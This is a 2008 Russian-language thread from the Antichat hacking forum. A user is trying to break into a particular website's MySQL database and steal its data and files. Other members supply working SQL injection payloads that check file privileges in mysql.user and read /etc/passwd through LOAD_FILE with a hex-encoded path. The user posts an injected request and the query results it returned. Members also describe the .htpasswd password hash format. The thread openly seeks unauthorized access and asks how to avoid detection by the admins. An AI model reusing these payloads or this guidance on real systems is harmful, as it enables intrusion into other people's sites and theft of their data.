ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите узнать файловую структуру сайта
  #1  
Старый 11.01.2008, 03:39
Аватар для Nicca
Nicca
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749

Репутация: 4
По умолчанию Помогите узнать файловую структуру сайта

Здравствуйте!
Бьюсь уже второй день над одним сайтом. Узнал список всех баз и таблиц, мускул: VERSION - 5.0.45-log
Подскажите как проверить есть привилегии file на сервере.
Мне по зарез нужно узнать файловую структуру, чтобы минимум скачать базу данных, максимум сам сайт.
И если включен file, то как еще можно хотя бы просмотреть файловую структуру?
Спасибо
 
Ответить с цитированием

  #2  
Старый 11.01.2008, 04:25
Аватар для Nicca
Nicca
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749

Репутация: 4
По умолчанию

Вот что еще удалось узнать
/usr/local/mysql/ basedir
/usr/local/mysql/var/ datadir
/tmp/ tmpdir
pc-linux-gnu version_compile_os

При выподнении лоадфайл ошибок никаких не выдавало, но и текста тоже никакого не было.
Значит привилегии file на сервере нет.
Подскажите как можно другим способом узнать файловую с-ру сайта? И слить базу
 
Ответить с цитированием

  #3  
Старый 11.01.2008, 04:37
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

во-первых узнай текущего пользователя ( user() )и если это root то file_priv скорее всего есть
во-вторых в mysql.user ( я так понял ты можешь прочесть эту таблицу) есть поле file_priv посмотри ее для того пользователя под которым работает скрипт
Цитата:
union select file_priv from mysql.user where user=left(user(),locate(0x40,user())-1)/*
это я сейчас выпендрился не обращай внимания (на случай если кавычка фильтруется)
в-третьих попробуй узнать версию ОС:
Цитата:
union select @@version_compile_os /*
если freeBSD или SunOS пиши ко мне в ЛС - помогу, но скорее всего Linux все же у тебя
если у тебя нет доступа к mysql.user пробуй загрузить /etc/passwd
Цитата:
union select LOAD_FILE(0x2F6574632F706173737764) /*
если вывелся файл passwd то file_priv есть, если ничего не вывелось, то file_priv скорее всего нет

если тебе повезло и file_priv есть, попытайся вызвать на сайте ошибку с раскрытием путей, если не получилось почитай статью http://forum.antichat.ru/thread30632.html и поищи файл httpd.conf (правда не факт, что хватит прав на чтение)


эх, долго я писал, блин, но лан пусть будет, а то вопросы про это частенько возникают, скопипастить будет откуда
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 11.01.2008 в 04:42..
 
Ответить с цитированием

  #4  
Старый 11.01.2008, 05:06
Аватар для Nicca
Nicca
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749

Репутация: 4
По умолчанию

intellitamper - я просканировал сайт этой прогой. Есть структура.
Как думаете админы не попалят что их сканировали?

LOAD_FILE(0x2F6574632F706173737764) /* выполнял ничего не выводит((((((((

Последний раз редактировалось Nicca; 11.01.2008 в 05:08..
 
Ответить с цитированием

  #5  
Старый 11.01.2008, 05:20
Аватар для Nicca
Nicca
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749

Репутация: 4
По умолчанию

Выполнил такой код:

&id=-1+union+select+1,2,3,4,5,6,7,file_priv,9,user+from +mysql.user/*

Y root
N puma
N as

Получается у меня есть файл прив?
 
Ответить с цитированием

  #6  
Старый 11.01.2008, 05:26
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

выполни такой:
&id=-1+union+select+1,2,3,4,5,6,7,file_priv,9,10 from mysql.user where user=left(user(),locate(0x40,user())-1)/*

да и вобще что функция user() возвращает?
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #7  
Старый 11.01.2008, 05:31
Аватар для Nicca
Nicca
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749

Репутация: 4
По умолчанию

Цитата:
Сообщение от Scipio  
выполни такой:
&id=-1+union+select+1,2,3,4,5,6,7,file_priv,9,10 from mysql.user where user=left(user(),locate(0x40,user())-1)/*

да и вобще что функция user() возвращает?
по этому запросу N

юзер возвращает puma
 
Ответить с цитированием

  #8  
Старый 11.01.2008, 13:22
Аватар для Nicca
Nicca
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749

Репутация: 4
По умолчанию

Да.. не очень сдесь отзывчивые пользователи...
На этом сайте проводится аутенфикация админов с помощью апача. Тоесть по идее пароли лежат в файлах..
Кто-то имел опыт "работы" с такой аутенфикацией?
 
Ответить с цитированием

  #9  
Старый 11.01.2008, 14:47
Аватар для gibson
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

ты имеешь ввиду хттп авторизацию? если да тогда, пасс могут быть . htpasswd примерно такой формат
123:$apr1$REDnNbWG$/JCaNJcKjz9jDyckyQc7i/ (123;123)
могут быть в скриптах, может пасс и логин проверяться из бд. По ходу у тя просто не привелегий поэтому не можешь записать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите узнать пароль админа Моргенштерн АнтиАдмин 27 21.07.2008 01:35
помогите узнать пасс компа босса :) mardoksp АнтиАдмин 14 29.12.2007 05:45
Как узнать логин от сайта? seeattact Уязвимости 14 28.02.2006 12:24
Помогите получить ftp пасс от сайта dyx Болталка 10 16.07.2005 07:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ